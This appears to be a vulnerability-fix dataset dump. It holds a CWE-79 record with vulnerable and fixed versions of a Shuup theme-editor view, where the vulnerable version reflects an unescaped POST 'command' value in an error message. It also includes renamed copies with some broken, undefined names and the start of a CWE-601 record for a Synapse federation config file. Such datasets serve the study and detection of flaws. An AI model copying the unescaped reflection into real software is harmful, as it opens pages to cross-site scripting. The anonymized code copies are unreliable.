659,
663,
665,
668,
672,
674,
678,
681,
682,
689,
695,
710,
715,
717,
720,
722,
730,
734,
739,
751,
761,
764,
770,
772,
776,
780,
784,
786,
788,
789,
790,
794,
798,
801,
804,
807,
812,
816,
818,
823,
828,
833,
845,
850,
854,
856,
859,
863,
865,
868,
873,
876,
878,
886,
889,
894,
901,
903,
905,
912,
918,
924,
929,
934,
938,
941,
946,
948,
951,
952,
955,
958,
969,
971,
981,
984,
989,
991,
1002,
1003,
1006,
1008,
1010,
1012,
1015,
1017,
1020,
1025,
1029,
1032,
1041,
1044,
1047,
1058,
1060,
1061,
1064,
1066,
1068,
1071,
1073,
1076,
1080,
1084,
1091,
1094,
1095,
1102,
1110,
1112,
1116,
1127,
1133,
1135,
1137,
1145,
1148,
1150,
1155,
1157,
1166,
1169,
1171,
1174,
1182,
1183,
1185,
1191,
1194,
1200,
1203,
1207,
1210,
1212,
1225,
1230,
1234,
1239,
1244,
1253,
1257,
1264,
1269,
1273,
1275,
1279,
1280,
1281,
1283,
1286,
1290,
1294,
1298,
1312,
1316,
1317,
1327,
1336,
1339,
1344,
1349,
1358,
1359,
1364,
1367,
1368,
1369,
1370,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
79,
1351,
81,
82,
83,
84,
85,
86,
87,
88,
130,
135,
139,
140,
184,
189,
190,
191,
192,
198,
204,
205,
206,
207,
208,
283,
287,
288,
289,
290,
291,
292,
293,
294,
345,
363,
368,
403,
408,
432,
436,
455,
534,
543,
567,
592,
624,
691,
692,
693,
694,
695,
696,
697,
732,
733,
734,
735,
736,
737,
738,
739,
740,
766,
835,
847,
870,
915,
921,
927,
932,
936,
940,
941,
942,
943,
944,
945,
946,
947,
973,
983,
984,
985,
986,
987,
988,
1022,
1027,
1043,
1044,
1045,
1046,
1047,
1048,
1049,
1050,
1051,
1052,
1053,
1082,
1086,
1093,
1115,
1116,
1117,
1118,
1119,
1159,
1160,
1187,
1193,
1194,
1195,
1196,
1205,
1209,
1210,
1211,
1227,
1241,
1255,
1277,
1278,
1296,
1297,
1298,
1299,
1314,
1319,
1320,
1321,
1341,
1346
] |
1CWE-79
| # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import json

from django.http.response import HttpResponse, HttpResponseRedirect
from django.middleware.csrf import get_token
from django.utils.html import escape
from django.utils.http import urlencode
from django.utils.translation import ugettext_lazy as _
from django.views.generic import TemplateView

from shuup.utils.excs import Problem
from shuup.xtheme import XTHEME_GLOBAL_VIEW_NAME
from shuup.xtheme._theme import get_theme_by_identifier
from shuup.xtheme.editing import could_edit
from shuup.xtheme.layout import Layout
from shuup.xtheme.layout.utils import get_provided_layouts
from shuup.xtheme.view_config import ViewConfig
from shuup.xtheme.views.forms import LayoutCellFormGroup
# since layouts will most likely break with multiple cells per row, we are
# limiting the amount.
ROW_CELL_LIMIT = 4
class EditorView(TemplateView):
    """Xtheme placeholder editor.

    Renders the editing UI for a single placeholder layout and dispatches
    the row/cell manipulation commands posted by that UI. Access requires
    `could_edit`; all editing state is resolved from GET parameters in
    `_populate_vars`.
    """

    template_name = "shuup/xtheme/editor.jinja"
    xtheme_injection = False  # We don't need the editing injection here, so opt-out
    changed = False  # Overridden in `save_layout`

    def _get_default_layout(self):
        # The opener may pass the view's default layout as JSON in the URL.
        try:
            return json.loads(self.request.GET["default_config"])
        except (ValueError, KeyError):
            return None

    def get_context_data(self, **kwargs):  # doccov: ignore
        ctx = super(EditorView, self).get_context_data(**kwargs)
        ctx["layout"] = self.layout
        ctx["csrf_token_str"] = get_token(self.request)
        # ctx["layout_debug"] = pformat(ctx["layout"].serialize())
        ctx["current_cell_coords"] = self.current_cell_coords
        ctx["current_cell"] = self.current_cell
        ctx["form"] = self.form
        ctx["changed"] = self.changed
        ctx["cell_limit"] = ROW_CELL_LIMIT
        return ctx

    def dispatch(self, request, *args, **kwargs):  # doccov: ignore
        if not could_edit(request):
            raise Problem(_("No access to editing."))
        self._populate_vars()
        if self.default_layout:
            self.view_config.save_default_placeholder_layout(self.placeholder_name, self.default_layout)
            # We saved the default layout, so get rid of the humongous GET arg and try again
            get_args = dict(self.request.GET.items())
            get_args.pop("default_config", None)
            global_type = get_args.pop("global_type", None)
            if global_type:
                get_args["view"] = XTHEME_GLOBAL_VIEW_NAME
            # We are overriding the view with XTHEME_GLOBAL_VIEW_NAME if this is a global placeholder
            return HttpResponseRedirect("%s?%s" % (self.request.path, urlencode(get_args)))
        return super(EditorView, self).dispatch(request, *args, **kwargs)

    def post(self, request, *args, **kwargs):  # doccov: ignore
        command = request.POST.get("command")
        if command:
            dispatcher = getattr(self, "dispatch_%s" % command, None)
            if not callable(dispatcher):
                # Security fix (CWE-79): `command` is user input reflected in
                # the error page; escape it so it cannot inject markup.
                raise Problem(_("Unknown command: `%s`.") % escape(command))
            dispatch_kwargs = dict(request.POST.items())
            rv = dispatcher(**dispatch_kwargs)
            if rv:
                return rv
            self.request.method = "GET"  # At this point, we won't want to cause form validation
            self.build_form()  # and it's not a bad idea to rebuild the form
            return super(EditorView, self).get(request, *args, **kwargs)

        if request.POST.get("save") and self.form and self.form.is_valid():
            self.form.save()
            self.save_layout()
            # after we save the new layout configs, make sure to reload the saved data in forms
            # so the returned get() response contains updated data
            self.build_form()

        if request.POST.get("publish") == "1":
            return self.dispatch_publish()

        return self.get(request, *args, **kwargs)

    def _populate_vars(self):
        """Resolve theme, view config, layout and current cell from GET args."""
        theme = get_theme_by_identifier(self.request.GET["theme"], self.request.shop)
        if not theme:
            raise Problem(_("Unable to determine the current theme."))
        view_name = self.request.GET["view"]
        global_type = self.request.GET.get("global_type", None)
        self.view_config = ViewConfig(
            theme=theme,
            shop=self.request.shop,
            view_name=view_name,
            draft=True,
            global_type=global_type,
        )
        # Let's store the layout data key for save here
        self.layout_data_key = self.request.GET.get("layout_data_key", None)
        # Let's use the layout identifier passed by the view to
        # fetch correct layout
        layout_identifier = self.request.GET.get("layout_identifier", None)
        layout_cls = Layout
        for provided_layout in get_provided_layouts():
            if provided_layout.identifier == layout_identifier:
                layout_cls = provided_layout
        self.placeholder_name = self.request.GET["ph"]
        self.default_layout = self._get_default_layout()
        self.layout = self.view_config.get_placeholder_layout(
            layout_cls=layout_cls,
            placeholder_name=self.placeholder_name,
            default_layout=self.default_layout,
            layout_data_key=self.layout_data_key,
        )
        (x, y) = self.current_cell_coords = (
            int(self.request.GET.get("x", -1)),
            int(self.request.GET.get("y", -1)),
        )
        self.current_cell = self.layout.get_cell(x=x, y=y)
        self.build_form()

    def build_form(self):
        """(Re)build the cell edit form; clears it when no cell is selected."""
        if not self.current_cell:
            self.form = None
            return
        kwargs = {"layout_cell": self.current_cell, "theme": self.view_config.theme, "request": self.request}
        if self.request.method == "POST":
            kwargs["data"] = self.request.POST
            kwargs["files"] = self.request.FILES
        self.form = LayoutCellFormGroup(**kwargs)

    def save_layout(self, layout=None):
        """Persist the given (or current) layout as a draft and mark changed."""
        self.view_config.save_placeholder_layout(layout_data_key=self.layout_data_key, layout=(layout or self.layout))
        self.changed = True

    def dispatch_add_cell(self, y, **kwargs):
        """Add a cell to row `y`, enforcing ROW_CELL_LIMIT."""
        y = int(y)
        # Bug fix: the bounds check previously ran AFTER `self.layout.rows[y]`
        # was indexed, so it could never take effect for out-of-range rows.
        if not (0 <= y < len(self.layout.rows)):
            # No need to raise an exception, really.
            # It must have been a honest mistake.
            return
        if len(self.layout.rows[y].cells) >= ROW_CELL_LIMIT:
            raise ValueError(_("Can't add more than %d cells in one row.") % ROW_CELL_LIMIT)
        self.layout.rows[y].add_cell()
        self.save_layout()

    def dispatch_add_row(self, y=None, **kwargs):
        """Append (or insert before index `y`) a new row with one cell."""
        row = self.layout.insert_row(y)
        row.add_cell()  # For convenience, add a cell to the row.
        self.save_layout()

    def dispatch_del_row(self, y, **kwargs):
        """Delete row `y`."""
        self.layout.delete_row(y)
        self.save_layout()

    def dispatch_move_row_to_index(self, from_y, to_y, **kwargs):
        """Move a whole row to a new index."""
        self.layout.move_row_to_index(from_y, to_y)
        self.save_layout()

    def dispatch_move_cell_to_position(self, from_x, from_y, to_x, to_y, **kwargs):
        """Move a single cell to a new position."""
        self.layout.move_cell_to_position(from_x, from_y, to_x, to_y)
        self.save_layout()

    def dispatch_del_cell(self, x, y, **kwargs):
        """Delete the cell at (x, y)."""
        self.layout.delete_cell(x, y)
        self.save_layout()

    def dispatch_change_plugin(self, plugin="", **kwargs):
        """Change (or clear, when empty) the plugin of the selected cell."""
        if self.current_cell:
            if not plugin:
                plugin = None
            self.current_cell.plugin_identifier = plugin
            self.save_layout()

    def dispatch_publish(self, **kwargs):
        """Publish the draft configuration and reload the opener window."""
        self.view_config.publish()
        return HttpResponse("<html><script>parent.location.reload()</script>%s.</html>" % _("Published"))

    def dispatch_revert(self, **kwargs):
        """Revert the draft configuration and reload the opener window."""
        self.view_config.revert()
        return HttpResponse("<html><script>parent.location.reload()</script>%s.</html>" % _("Reverted"))
| # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import json
from django.http.response import HttpResponse, HttpResponseRedirect
from django.middleware.csrf import get_token
from django.utils.html import escape
from django.utils.http import urlencode
from django.utils.translation import ugettext_lazy as _
from django.views.generic import TemplateView
from shuup.utils.excs import Problem
from shuup.xtheme import XTHEME_GLOBAL_VIEW_NAME
from shuup.xtheme._theme import get_theme_by_identifier
from shuup.xtheme.editing import could_edit
from shuup.xtheme.layout import Layout
from shuup.xtheme.layout.utils import get_provided_layouts
from shuup.xtheme.view_config import ViewConfig
from shuup.xtheme.views.forms import LayoutCellFormGroup
# since layouts will most likely break with multiple cells per row, we are
# limiting the amount.
ROW_CELL_LIMIT = 4
class EditorView(TemplateView):
template_name = "shuup/xtheme/editor.jinja"
xtheme_injection = False # We don't need the editing injection here, so opt-out
changed = False # Overridden in `save_layout`
def _get_default_layout(self):
try:
return json.loads(self.request.GET["default_config"])
except (ValueError, KeyError):
return None
def get_context_data(self, **kwargs): # doccov: ignore
ctx = super(EditorView, self).get_context_data(**kwargs)
ctx["layout"] = self.layout
ctx["csrf_token_str"] = get_token(self.request)
# ctx["layout_debug"] = pformat(ctx["layout"].serialize())
ctx["current_cell_coords"] = self.current_cell_coords
ctx["current_cell"] = self.current_cell
ctx["form"] = self.form
ctx["changed"] = self.changed
ctx["cell_limit"] = ROW_CELL_LIMIT
return ctx
def dispatch(self, request, *args, **kwargs): # doccov: ignore
if not could_edit(request):
raise Problem(_("No access to editing."))
self._populate_vars()
if self.default_layout:
self.view_config.save_default_placeholder_layout(self.placeholder_name, self.default_layout)
# We saved the default layout, so get rid of the humongous GET arg and try again
get_args = dict(self.request.GET.items())
get_args.pop("default_config", None)
global_type = get_args.pop("global_type", None)
if global_type:
get_args["view"] = XTHEME_GLOBAL_VIEW_NAME
# We are overriding the view with XTHEME_GLOBAL_VIEW_NAME if this is a global placeholder
return HttpResponseRedirect("%s?%s" % (self.request.path, urlencode(get_args)))
return super(EditorView, self).dispatch(request, *args, **kwargs)
def post(self, request, *args, **kwargs): # doccov: ignore
command = request.POST.get("command")
if command:
dispatcher = getattr(self, "dispatch_%s" % command, None)
if not callable(dispatcher):
raise Problem(_("Unknown command: `%s`.") % escape(command))
dispatch_kwargs = dict(request.POST.items())
rv = dispatcher(**dispatch_kwargs)
if rv:
return rv
self.request.method = "GET" # At this point, we won't want to cause form validation
self.build_form() # and it's not a bad idea to rebuild the form
return super(EditorView, self).get(request, *args, **kwargs)
if request.POST.get("save") and self.form and self.form.is_valid():
self.form.save()
self.save_layout()
# after we save the new layout configs, make sure to reload the saved data in forms
# so the returned get() response contains updated data
self.build_form()
if request.POST.get("publish") == "1":
return self.dispatch_publish()
return self.get(request, *args, **kwargs)
def _populate_vars(self):
theme = get_theme_by_identifier(self.request.GET["theme"], self.request.shop)
if not theme:
raise Problem(_("Unable to determine the current theme."))
view_name = self.request.GET["view"]
global_type = self.request.GET.get("global_type", None)
self.view_config = ViewConfig(
theme=theme,
shop=self.request.shop,
view_name=view_name,
draft=True,
global_type=global_type,
)
# Let's store the layout data key for save here
self.layout_data_key = self.request.GET.get("layout_data_key", None)
# Let's use the layout identifier passed by the view to
# fetch correct layout
layout_identifier = self.request.GET.get("layout_identifier", None)
layout_cls = Layout
for provided_layout in get_provided_layouts():
if provided_layout.identifier == layout_identifier:
layout_cls = provided_layout
self.placeholder_name = self.request.GET["ph"]
self.default_layout = self._get_default_layout()
self.layout = self.view_config.get_placeholder_layout(
layout_cls=layout_cls,
placeholder_name=self.placeholder_name,
default_layout=self.default_layout,
layout_data_key=self.layout_data_key,
)
(x, y) = self.current_cell_coords = (
int(self.request.GET.get("x", -1)),
int(self.request.GET.get("y", -1)),
)
self.current_cell = self.layout.get_cell(x=x, y=y)
self.build_form()
def build_form(self):
if not self.current_cell:
self.form = None
return
kwargs = {"layout_cell": self.current_cell, "theme": self.view_config.theme, "request": self.request}
if self.request.method == "POST":
kwargs["data"] = self.request.POST
kwargs["files"] = self.request.FILES
self.form = LayoutCellFormGroup(**kwargs)
def save_layout(self, layout=None):
self.view_config.save_placeholder_layout(layout_data_key=self.layout_data_key, layout=(layout or self.layout))
self.changed = True
def dispatch_add_cell(self, y, **kwargs):
y = int(y)
if len(self.layout.rows[y].cells) >= ROW_CELL_LIMIT:
raise ValueError(_("Can't add more than %d cells in one row.") % ROW_CELL_LIMIT)
if not (0 <= y < len(self.layout.rows)):
# No need to raise an exception, really.
# It must have been a honest mistake.
return
self.layout.rows[y].add_cell()
self.save_layout()
def dispatch_add_row(self, y=None, **kwargs):
row = self.layout.insert_row(y)
row.add_cell() # For convenience, add a cell to the row.
self.save_layout()
def dispatch_del_row(self, y, **kwargs):
self.layout.delete_row(y)
self.save_layout()
def dispatch_move_row_to_index(self, from_y, to_y, **kwargs):
self.layout.move_row_to_index(from_y, to_y)
self.save_layout()
def dispatch_move_cell_to_position(self, from_x, from_y, to_x, to_y, **kwargs):
self.layout.move_cell_to_position(from_x, from_y, to_x, to_y)
self.save_layout()
def dispatch_del_cell(self, x, y, **kwargs):
self.layout.delete_cell(x, y)
self.save_layout()
def dispatch_change_plugin(self, plugin="", **kwargs):
if self.current_cell:
if not plugin:
plugin = None
self.current_cell.plugin_identifier = plugin
self.save_layout()
def dispatch_publish(self, **kwargs):
self.view_config.publish()
return HttpResponse("<html><script>parent.location.reload()</script>%s.</html>" % _("Published"))
def dispatch_revert(self, **kwargs):
self.view_config.revert()
return HttpResponse("<html><script>parent.location.reload()</script>%s.</html>" % _("Reverted"))
| xss | {
"code": [
" raise Problem(_(\"Unknown command: `%s`.\") % command)"
],
"line_no": [
73
]
} | {
"code": [
"from django.utils.html import escape",
" raise Problem(_(\"Unknown command: `%s`.\") % escape(command))"
],
"line_no": [
11,
74
]
} |
import json
from django.http.response import HttpResponse, HttpResponseRedirect
from django.middleware.csrf import get_token
from django.utils.http import urlencode
from django.utils.translation import ugettext_lazy as _
from django.views.generic import TemplateView
from shuup.utils.excs import Problem
from shuup.xtheme import XTHEME_GLOBAL_VIEW_NAME
from shuup.xtheme._theme import get_theme_by_identifier
from shuup.xtheme.editing import could_edit
from shuup.xtheme.layout import Layout
from shuup.xtheme.layout.utils import get_provided_layouts
from shuup.xtheme.view_config import ViewConfig
from shuup.xtheme.views.forms import LayoutCellFormGroup
VAR_0 = 4
class CLASS_0(TemplateView):
VAR_1 = "shuup/xtheme/editor.jinja"
VAR_2 = False # We don't need the editing injection here, so opt-out
VAR_3 = False # Overridden in `FUNC_6`
def FUNC_0(self):
try:
return json.loads(self.request.GET["default_config"])
except (ValueError, KeyError):
return None
def FUNC_1(self, **VAR_4): # doccov: ignore
VAR_15 = super(CLASS_0, self).get_context_data(**VAR_4)
VAR_15["layout"] = self.layout
VAR_15["csrf_token_str"] = get_token(self.request)
VAR_15["current_cell_coords"] = self.current_cell_coords
VAR_15["current_cell"] = self.current_cell
VAR_15["form"] = self.form
VAR_15["changed"] = self.changed
VAR_15["cell_limit"] = VAR_0
return VAR_15
def FUNC_2(self, VAR_5, *VAR_6, **VAR_4): # doccov: ignore
if not could_edit(VAR_5):
raise Problem(_("No access to editing."))
self._populate_vars()
if self.default_layout:
self.view_config.save_default_placeholder_layout(self.placeholder_name, self.default_layout)
VAR_23 = dict(self.request.GET.items())
VAR_23.pop("default_config", None)
VAR_19 = VAR_23.pop("global_type", None)
if VAR_19:
VAR_23["view"] = XTHEME_GLOBAL_VIEW_NAME
return HttpResponseRedirect("%s?%s" % (self.request.path, urlencode(VAR_23)))
return super(CLASS_0, self).dispatch(VAR_5, *VAR_6, **VAR_4)
def FUNC_3(self, VAR_5, *VAR_6, **VAR_4): # doccov: ignore
VAR_16 = VAR_5.POST.get("command")
if VAR_16:
VAR_24 = getattr(self, "dispatch_%s" % VAR_16, None)
if not callable(VAR_24):
raise Problem(_("Unknown VAR_16: `%s`.") % VAR_16)
VAR_25 = dict(VAR_5.POST.items())
VAR_26 = VAR_24(**VAR_25)
if VAR_26:
return VAR_26
self.request.method = "GET" # At this point, we won't want to cause form validation
self.build_form() # and it's not a bad idea to rebuild the form
return super(CLASS_0, self).get(VAR_5, *VAR_6, **VAR_4)
if VAR_5.POST.get("save") and self.form and self.form.is_valid():
self.form.save()
self.save_layout()
self.build_form()
if VAR_5.POST.get("publish") == "1":
return self.dispatch_publish()
return self.get(VAR_5, *VAR_6, **VAR_4)
def FUNC_4(self):
VAR_17 = get_theme_by_identifier(self.request.GET["theme"], self.request.shop)
if not VAR_17:
raise Problem(_("Unable to determine the current VAR_17."))
VAR_18 = self.request.GET["view"]
VAR_19 = self.request.GET.get("global_type", None)
self.view_config = ViewConfig(
VAR_17=theme,
shop=self.request.shop,
VAR_18=view_name,
draft=True,
VAR_19=global_type,
)
self.layout_data_key = self.request.GET.get("layout_data_key", None)
VAR_20 = self.request.GET.get("layout_identifier", None)
VAR_21 = Layout
for provided_layout in get_provided_layouts():
if provided_layout.identifier == VAR_20:
VAR_21 = provided_layout
self.placeholder_name = self.request.GET["ph"]
self.default_layout = self._get_default_layout()
self.layout = self.view_config.get_placeholder_layout(
VAR_21=layout_cls,
placeholder_name=self.placeholder_name,
default_layout=self.default_layout,
layout_data_key=self.layout_data_key,
)
(VAR_13, VAR_8) = self.current_cell_coords = (
int(self.request.GET.get("x", -1)),
int(self.request.GET.get("y", -1)),
)
self.current_cell = self.layout.get_cell(VAR_13=x, VAR_8=y)
self.build_form()
def FUNC_5(self):
if not self.current_cell:
self.form = None
return
VAR_4 = {"layout_cell": self.current_cell, "theme": self.view_config.theme, "request": self.request}
if self.request.method == "POST":
VAR_4["data"] = self.request.POST
VAR_4["files"] = self.request.FILES
self.form = LayoutCellFormGroup(**VAR_4)
def FUNC_6(self, VAR_7=None):
self.view_config.save_placeholder_layout(layout_data_key=self.layout_data_key, VAR_7=(layout or self.layout))
self.changed = True
def FUNC_7(self, VAR_8, **VAR_4):
VAR_8 = int(VAR_8)
if len(self.layout.rows[VAR_8].cells) >= VAR_0:
raise ValueError(_("Can't add more than %d cells in one VAR_22.") % VAR_0)
if not (0 <= VAR_8 < len(self.layout.rows)):
return
self.layout.rows[VAR_8].add_cell()
self.save_layout()
def FUNC_8(self, VAR_8=None, **VAR_4):
VAR_22 = self.layout.insert_row(VAR_8)
VAR_22.add_cell() # For convenience, add a cell to the VAR_22.
self.save_layout()
def FUNC_9(self, VAR_8, **VAR_4):
self.layout.delete_row(VAR_8)
self.save_layout()
def FUNC_10(self, VAR_9, VAR_10, **VAR_4):
self.layout.move_row_to_index(VAR_9, VAR_10)
self.save_layout()
def FUNC_11(self, VAR_11, VAR_9, VAR_12, VAR_10, **VAR_4):
self.layout.move_cell_to_position(VAR_11, VAR_9, VAR_12, VAR_10)
self.save_layout()
def FUNC_12(self, VAR_13, VAR_8, **VAR_4):
self.layout.delete_cell(VAR_13, VAR_8)
self.save_layout()
def FUNC_13(self, VAR_14="", **VAR_4):
if self.current_cell:
if not VAR_14:
plugin = None
self.current_cell.plugin_identifier = VAR_14
self.save_layout()
def FUNC_14(self, **VAR_4):
self.view_config.publish()
return HttpResponse("<html><script>parent.location.reload()</script>%s.</html>" % _("Published"))
def FUNC_15(self, **VAR_4):
self.view_config.revert()
return HttpResponse("<html><script>parent.location.reload()</script>%s.</html>" % _("Reverted"))
|
import json
from django.http.response import HttpResponse, HttpResponseRedirect
from django.middleware.csrf import get_token
from django.utils.html import escape
from django.utils.http import urlencode
from django.utils.translation import ugettext_lazy as _
from django.views.generic import TemplateView
from shuup.utils.excs import Problem
from shuup.xtheme import XTHEME_GLOBAL_VIEW_NAME
from shuup.xtheme._theme import get_theme_by_identifier
from shuup.xtheme.editing import could_edit
from shuup.xtheme.layout import Layout
from shuup.xtheme.layout.utils import get_provided_layouts
from shuup.xtheme.view_config import ViewConfig
from shuup.xtheme.views.forms import LayoutCellFormGroup
VAR_0 = 4
class CLASS_0(TemplateView):
VAR_1 = "shuup/xtheme/editor.jinja"
VAR_2 = False # We don't need the editing injection here, so opt-out
VAR_3 = False # Overridden in `FUNC_6`
def FUNC_0(self):
try:
return json.loads(self.request.GET["default_config"])
except (ValueError, KeyError):
return None
def FUNC_1(self, **VAR_4): # doccov: ignore
VAR_15 = super(CLASS_0, self).get_context_data(**VAR_4)
VAR_15["layout"] = self.layout
VAR_15["csrf_token_str"] = get_token(self.request)
VAR_15["current_cell_coords"] = self.current_cell_coords
VAR_15["current_cell"] = self.current_cell
VAR_15["form"] = self.form
VAR_15["changed"] = self.changed
VAR_15["cell_limit"] = VAR_0
return VAR_15
def FUNC_2(self, VAR_5, *VAR_6, **VAR_4): # doccov: ignore
if not could_edit(VAR_5):
raise Problem(_("No access to editing."))
self._populate_vars()
if self.default_layout:
self.view_config.save_default_placeholder_layout(self.placeholder_name, self.default_layout)
VAR_23 = dict(self.request.GET.items())
VAR_23.pop("default_config", None)
VAR_19 = VAR_23.pop("global_type", None)
if VAR_19:
VAR_23["view"] = XTHEME_GLOBAL_VIEW_NAME
return HttpResponseRedirect("%s?%s" % (self.request.path, urlencode(VAR_23)))
return super(CLASS_0, self).dispatch(VAR_5, *VAR_6, **VAR_4)
def FUNC_3(self, VAR_5, *VAR_6, **VAR_4): # doccov: ignore
VAR_16 = VAR_5.POST.get("command")
if VAR_16:
VAR_24 = getattr(self, "dispatch_%s" % VAR_16, None)
if not callable(VAR_24):
raise Problem(_("Unknown VAR_16: `%s`.") % escape(VAR_16))
VAR_25 = dict(VAR_5.POST.items())
VAR_26 = VAR_24(**VAR_25)
if VAR_26:
return VAR_26
self.request.method = "GET" # At this point, we won't want to cause form validation
self.build_form() # and it's not a bad idea to rebuild the form
return super(CLASS_0, self).get(VAR_5, *VAR_6, **VAR_4)
if VAR_5.POST.get("save") and self.form and self.form.is_valid():
self.form.save()
self.save_layout()
self.build_form()
if VAR_5.POST.get("publish") == "1":
return self.dispatch_publish()
return self.get(VAR_5, *VAR_6, **VAR_4)
def FUNC_4(self):
VAR_17 = get_theme_by_identifier(self.request.GET["theme"], self.request.shop)
if not VAR_17:
raise Problem(_("Unable to determine the current VAR_17."))
VAR_18 = self.request.GET["view"]
VAR_19 = self.request.GET.get("global_type", None)
self.view_config = ViewConfig(
VAR_17=theme,
shop=self.request.shop,
VAR_18=view_name,
draft=True,
VAR_19=global_type,
)
self.layout_data_key = self.request.GET.get("layout_data_key", None)
VAR_20 = self.request.GET.get("layout_identifier", None)
VAR_21 = Layout
for provided_layout in get_provided_layouts():
if provided_layout.identifier == VAR_20:
VAR_21 = provided_layout
self.placeholder_name = self.request.GET["ph"]
self.default_layout = self._get_default_layout()
self.layout = self.view_config.get_placeholder_layout(
VAR_21=layout_cls,
placeholder_name=self.placeholder_name,
default_layout=self.default_layout,
layout_data_key=self.layout_data_key,
)
(VAR_13, VAR_8) = self.current_cell_coords = (
int(self.request.GET.get("x", -1)),
int(self.request.GET.get("y", -1)),
)
self.current_cell = self.layout.get_cell(VAR_13=x, VAR_8=y)
self.build_form()
def FUNC_5(self):
if not self.current_cell:
self.form = None
return
VAR_4 = {"layout_cell": self.current_cell, "theme": self.view_config.theme, "request": self.request}
if self.request.method == "POST":
VAR_4["data"] = self.request.POST
VAR_4["files"] = self.request.FILES
self.form = LayoutCellFormGroup(**VAR_4)
def FUNC_6(self, VAR_7=None):
self.view_config.save_placeholder_layout(layout_data_key=self.layout_data_key, VAR_7=(layout or self.layout))
self.changed = True
def FUNC_7(self, VAR_8, **VAR_4):
VAR_8 = int(VAR_8)
if len(self.layout.rows[VAR_8].cells) >= VAR_0:
raise ValueError(_("Can't add more than %d cells in one VAR_22.") % VAR_0)
if not (0 <= VAR_8 < len(self.layout.rows)):
return
self.layout.rows[VAR_8].add_cell()
self.save_layout()
def FUNC_8(self, VAR_8=None, **VAR_4):
VAR_22 = self.layout.insert_row(VAR_8)
VAR_22.add_cell() # For convenience, add a cell to the VAR_22.
self.save_layout()
def FUNC_9(self, VAR_8, **VAR_4):
self.layout.delete_row(VAR_8)
self.save_layout()
def FUNC_10(self, VAR_9, VAR_10, **VAR_4):
self.layout.move_row_to_index(VAR_9, VAR_10)
self.save_layout()
def FUNC_11(self, VAR_11, VAR_9, VAR_12, VAR_10, **VAR_4):
self.layout.move_cell_to_position(VAR_11, VAR_9, VAR_12, VAR_10)
self.save_layout()
def FUNC_12(self, VAR_13, VAR_8, **VAR_4):
self.layout.delete_cell(VAR_13, VAR_8)
self.save_layout()
def FUNC_13(self, VAR_14="", **VAR_4):
if self.current_cell:
if not VAR_14:
plugin = None
self.current_cell.plugin_identifier = VAR_14
self.save_layout()
def FUNC_14(self, **VAR_4):
self.view_config.publish()
return HttpResponse("<html><script>parent.location.reload()</script>%s.</html>" % _("Published"))
def FUNC_15(self, **VAR_4):
self.view_config.revert()
return HttpResponse("<html><script>parent.location.reload()</script>%s.</html>" % _("Reverted"))
| [
1,
2,
3,
4,
5,
6,
7,
14,
23,
24,
25,
27,
28,
33,
39,
44,
51,
58,
64,
67,
81,
85,
86,
87,
89,
92,
94,
108,
109,
111,
112,
113,
119,
134,
144,
148,
153,
155,
156,
160,
165,
169,
173,
177,
181,
188,
192,
196
] | [
1,
2,
3,
4,
5,
6,
7,
15,
24,
25,
26,
28,
29,
34,
40,
45,
52,
59,
65,
68,
82,
86,
87,
88,
90,
93,
95,
109,
110,
112,
113,
114,
120,
135,
145,
149,
154,
156,
157,
161,
166,
170,
174,
178,
182,
189,
193,
197
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2020 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Optional
from netaddr import IPSet
from synapse.config._base import Config, ConfigError
from synapse.config._util import validate_config
class FederationConfig(Config):
section = "federation"
def read_config(self, config, **kwargs):
# FIXME: federation_domain_whitelist needs sytests
self.federation_domain_whitelist = None # type: Optional[dict]
federation_domain_whitelist = config.get("federation_domain_whitelist", None)
if federation_domain_whitelist is not None:
# turn the whitelist into a hash for speed of lookup
self.federation_domain_whitelist = {}
for domain in federation_domain_whitelist:
self.federation_domain_whitelist[domain] = True
self.federation_ip_range_blacklist = config.get(
"federation_ip_range_blacklist", []
)
# Attempt to create an IPSet from the given ranges
try:
self.federation_ip_range_blacklist = IPSet(
self.federation_ip_range_blacklist
)
# Always blacklist 0.0.0.0, ::
self.federation_ip_range_blacklist.update(["0.0.0.0", "::"])
except Exception as e:
raise ConfigError(
"Invalid range(s) provided in federation_ip_range_blacklist: %s" % e
)
federation_metrics_domains = config.get("federation_metrics_domains") or []
validate_config(
_METRICS_FOR_DOMAINS_SCHEMA,
federation_metrics_domains,
("federation_metrics_domains",),
)
self.federation_metrics_domains = set(federation_metrics_domains)
def generate_config_section(self, config_dir_path, server_name, **kwargs):
return """\
## Federation ##
# Restrict federation to the following whitelist of domains.
# N.B. we recommend also firewalling your federation listener to limit
# inbound federation traffic as early as possible, rather than relying
# purely on this application-layer restriction. If not specified, the
# default is to whitelist everything.
#
#federation_domain_whitelist:
# - lon.example.com
# - nyc.example.com
# - syd.example.com
# Prevent federation requests from being sent to the following
# blacklist IP address CIDR ranges. If this option is not specified, or
# specified with an empty list, no ip range blacklist will be enforced.
#
# As of Synapse v1.4.0 this option also affects any outbound requests to identity
# servers provided by user input.
#
# (0.0.0.0 and :: are always blacklisted, whether or not they are explicitly
# listed here, since they correspond to unroutable addresses.)
#
federation_ip_range_blacklist:
- '127.0.0.0/8'
- '10.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
- '100.64.0.0/10'
- '169.254.0.0/16'
- '::1/128'
- 'fe80::/64'
- 'fc00::/7'
# Report prometheus metrics on the age of PDUs being sent to and received from
# the following domains. This can be used to give an idea of "delay" on inbound
# and outbound federation, though be aware that any delay can be due to problems
# at either end or with the intermediate network.
#
# By default, no domains are monitored in this way.
#
#federation_metrics_domains:
# - matrix.org
# - example.com
"""
_METRICS_FOR_DOMAINS_SCHEMA = {"type": "array", "items": {"type": "string"}}
